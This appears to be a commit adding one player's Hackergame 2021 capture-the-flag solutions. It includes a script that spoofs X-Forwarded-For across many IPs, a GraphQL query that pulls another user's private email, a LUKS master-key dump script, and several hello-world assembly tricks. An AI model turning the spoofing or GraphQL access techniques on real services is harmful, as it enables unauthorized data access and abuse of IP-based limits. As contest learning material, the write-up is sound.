Add Testla's write-up

Author: Testla

README.md

@@ -99,6 +99,7 @@
 | [tl2cents](players/tl2cents/README.md)  [博客](https://tl2cents.github.io/2021/10/31/Hackgame2021/) | 总排名第 70 | FLAG 助力大红包，图之上的信息，Easy RSA，马赛克，Minecraft，超 OI 的 Writeup 模拟器（前两问） |
 | [EarthC](players/EarthC/) | 总排名第 26 名 | 灯，等灯等灯, 超 OI 的 Writeup 模拟器(部分) |
 | [cvhc](players/cvhc/README.md) | 总排名第 13 名 | 阵列恢复大师，马赛克，Amnesia，只读文件系统，minecRaft，Micro World，fzuu，密码生成器，一石二鸟，p😭q |
+| [Testla](players/Testla/) | 总排名第 43 名 | 签到、进制十六——参上、去吧！追寻自由的电波、猫咪问答 Pro Max、卖瓜、透明的文件、旅行照片、FLAG 助力大红包、Amnesia - 轻度失忆、图之上的信息、加密的 U 盘、赛博厨房 - Level0, Level1、Co-Program - Co-UnitTest、马赛克、minecRaft、p😭q、超 OI 的 Writeup 模拟器 - 果然还是逆向比较简单 |
 
 ## 其他资源
 

players/Testla/08-FLAG 助力大红包/kan.py

@@ -0,0 +1,30 @@
+import requests
+import time
+
+
+def main() -> None:
+    d = {
+        'sessionid': '<Redacted>',
+        'csrftoken': '<Redacted>',
+        'session': '<Redacted>',
+    }
+    with requests.Session() as s:
+        s.cookies.update(d)
+        for first_segment in range(2 ** 8):
+            ip = f'{first_segment}.0.0.1'
+            headers = {
+                'Content-Type': 'application/x-www-form-urlencoded',
+                'X-Forwarded-For': ip,
+            }
+            r = s.post(
+                'http://202.38.93.111:10888/invite/<Redacted>',
+                headers=headers,
+                data={
+                    'ip': ip,
+                }
+            )
+            print(*filter(lambda l: '地址' in l, r.text.splitlines()))
+            time.sleep(1.1)
+
+if __name__ == '__main__':
+    main()

players/Testla/09-Amnesia/Amnesia-1.c

@@ -0,0 +1,18 @@
+#include <stdio.h>
+
+int main(void) {
+    putchar('H');
+    putchar('e');
+    putchar('l');
+    putchar('l');
+    putchar('o');
+    putchar(',');
+    putchar(' ');
+    putchar('w');
+    putchar('o');
+    putchar('r');
+    putchar('l');
+    putchar('d');
+    putchar('!');
+    return 0;
+}

players/Testla/09-Amnesia/array_main.c

@@ -0,0 +1,32 @@
+const char main[] = {
+    0x55,                               // push   %ebp
+    0x89, 0xe5,                         // mov    %esp,%ebp
+    0x56,                               // push   %esi
+    0x53,                               // push   %ebx
+    0xe8, 0x28, 0x00, 0x00, 0x00,       // call   11bb <__x86.get_pc_thunk.ax>
+    0x05, 0x6d, 0x2e, 0x00, 0x00,       // add    $0x2e6d,%eax
+    0x8d, 0xb0, 0x2d, 0x00, 0x00, 0x00, // lea    0x2D(%eax),%esi
+    0xb8, 0x04, 0x00, 0x00, 0x00,       // mov    $0x4,%eax
+    0xbb, 0x01, 0x00, 0x00, 0x00,       // mov    $0x1,%ebx
+    0x89, 0xf1,                         // mov    %esi,%ecx
+    0xba, 0x0e, 0x00, 0x00, 0x00,       // mov    $0xe,%edx
+    0xcd, 0x80,                         // int    $0x80
+    0xb8, 0x00, 0x00, 0x00, 0x00,       // mov    $0x0,%eax
+    0x90,                               // nop
+    0x5b,                               // pop    %ebx
+    0x5e,                               // pop    %esi
+    0x5d,                               // pop    %ebp
+    0xc3,                               // ret    
+    // 000011bb <__x86.get_pc_thunk.ax>:
+    0x8b, 0x04, 0x24,                   // mov    (%esp),%eax
+    0xc3,                               // ret    
+    0x90,                               // nop
+    // "Hello, world\n"
+    0x48, 0x65, 0x6c, 0x6c, 0x6f, 0x2c, 0x20, 0x77, 0x6f, 0x72, 0x6c, 0x64, 0x21, 0x0a
+    //0xb8, 0x00, 0x00, 0x00, 0x00,       // mov    $0x0,%eax
+    //0xc3,                               // ret    
+    //0x90,                               // nop
+    //0x90,                               // nop
+    //0x90,                               // nop
+    //0x90,                               // nop
+};

players/Testla/09-Amnesia/inline_asm-x86_32.c

@@ -0,0 +1,23 @@
+const char message[] = "Hello, world!\n";
+
+void main(void) {
+    asm(
+        // https://lwn.net/Articles/604515/
+        // syscall number
+        // https://elixir.bootlin.com/linux/v3.14/source/arch/x86/syscalls/syscall_32.tbl#L12
+        "mov $4, %%eax;\n\t"
+        // fd of stdout
+        "mov $1, %%ebx;\n\t"
+        // buffer
+        "mov %[message], %%ecx;\n\t"
+        // length
+        "mov $14, %%edx;\n\t"
+        // do syscall
+        "int $0x80;\n\t"
+        // return 0
+        "mov $0, %%eax;\n\t"
+        : 
+        : [message] "r" (message)
+        : "%eax", "%ebx", "%ecx", "%edx"
+    );
+}

players/Testla/09-Amnesia/normal.c

@@ -0,0 +1,6 @@
+#include <unistd.h>
+
+int main(void) {
+    //write(0x55, 0xabcd, 0x77);
+    write(1, "Hello, world!\n", 13);
+}

players/Testla/09-Amnesia/relative_addressing-x86_64.c

@@ -0,0 +1,24 @@
+void main() {
+    __asm__ (
+        // print Hello World
+        //"movl $1, %eax;\n"  /* 1 is the syscall number for write */
+        "mov $1, %rax;\n"  /* 1 is the syscall number for write */
+        //"movl $1, %ebx;\n"  /* 1 is stdout and is the first argument */
+        "mov $1, %rdi;\n"  /* 1 is stdout and is the first argument */
+        // "movl $message, %esi;\n" /* load the address of string into the second argument*/
+        // instead use this to load the address of the string
+        // as 16 bytes from the current instruction
+        //"leal 16(%eip), %esi;\n"
+        "lea 18(%rip), %rsi;\n"
+        //"movl $13, %edx;\n"  /* third argument is the length of the string to print*/
+        "mov $13, %rdx;\n"  /* third argument is the length of the string to print*/
+        "syscall;\n"
+        // call exit (so it doesn't try to run the string Hello World
+        // maybe I could have just used ret instead
+        "movl $60,%eax;\n"
+        "xorl %ebx,%ebx; \n"
+        "syscall;\n"
+        // Store the Hello World inside the main function
+        "message: .ascii \"Hello World!\\n\";"
+    );
+}

players/Testla/10-图之上的信息/graphql.py

@@ -0,0 +1,23 @@
+import requests
+
+def main() -> None:
+    d = {
+        'sessionid': '<Redacted>',
+        'csrftoken': '<Redacted>',
+        'session': '<Redacted>',
+    }
+    with requests.Session() as s:
+        s.cookies.update(d)
+        r = s.post(
+            'http://202.38.93.111:15001/graphql',
+            json={
+                # 'query': '{ notes(userId: 2) { id\ncontents }}'
+                'query': '{ user(id: 1) { privateEmail } }'
+                # 'query': '{ __schema { types { name } } }'
+                # 'query': '{ __type(name: "GUser") { name,fields { name,type { name,kind } } } }'
+            }
+        )
+        print(r.text)
+
+if __name__ == '__main__':
+    main()

players/Testla/10-图之上的信息/parse_cookies.py

@@ -0,0 +1,8 @@
+# https://stackoverflow.com/a/32281245
+from http.cookies import SimpleCookie as sc
+c = sc()
+c.load('session=...')
+d = {}
+for key, morsel in c.items():
+    d[key] = morsel.value
+print(d)

players/Testla/12-加密的 U 盘/dump_master_key.sh

@@ -0,0 +1,5 @@
+#!/bin/bash
+
+mapdevice="/dev/mapper/$(sudo kpartx -va day1.img | sed -E 's/.*(loop[0-9]+p[0-9]+).*/\1/g' | head -1)"
+sudo cryptsetup luksDump --dump-master-key $mapdevice
+sudo kpartx -d $mapdevice